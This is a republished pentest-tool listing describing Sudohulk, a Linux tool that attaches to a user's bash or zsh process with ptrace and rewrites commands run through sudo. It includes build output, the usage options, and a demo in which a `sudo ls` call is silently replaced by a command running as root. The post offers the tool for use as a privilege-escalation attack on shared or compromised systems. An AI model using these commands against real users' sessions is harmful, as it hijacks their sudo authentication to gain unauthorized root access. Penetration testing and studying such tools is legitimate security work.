Sudohulk - Try Privilege Escalation Changing Sudo Command - KitPloit - PenTest Tools for your Security Arsenal ☣
2018-03-21 22:28:53 Author: www.kitploit.com(查看原文) 阅读量:140 收藏

This tool change sudo command, hooking the execve syscall using ptrace, tested under bash and zsh

supported architectures:

  • x86_64
  • x86
  • arm


How use:

$ make
cc -Wall -Wextra -O2 -c -o bin/sh_remotedata.o src/sh_remotedata.c
cc -Wall -Wextra -O2 -c -o bin/sh_string.o src/sh_string.c
cc -Wall -Wextra -O2 -c -o bin/sudohulk.o src/sudohulk.c
cc -Wall -Wextra -O2 -o sudohulk bin/sh_remotedata.o bin/sh_string.o bin/sudohulk.o
$ ./sudohulk 
sudohulk [-qdk] PID COMMAND [ARGS]

Options:
   -q quit when change a command
   -d run in background
   -k keep original command line (appending to new)

NOTES:
PID = bash or zsh pid
To attach the current session use -d option, example:

$ ./sudohulk -qd $$ id
running in background, pid:20899
$ sudo ls -lah
[sudo] senha para mmxm: 
uid=0(root) gid=0(root) grupos=0(root)

Demo

Sudohulk - Try Privilege Escalation Changing Sudo Command Sudohulk - Try Privilege Escalation Changing Sudo Command Reviewed by Lydecker Black on 10:08 AM Rating: 5


文章来源: https://www.kitploit.com/2018/03/sudohulk-try-privilege-escalation.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+%28PenTest+Tools%29
如有侵权请联系:admin#unsafe.sh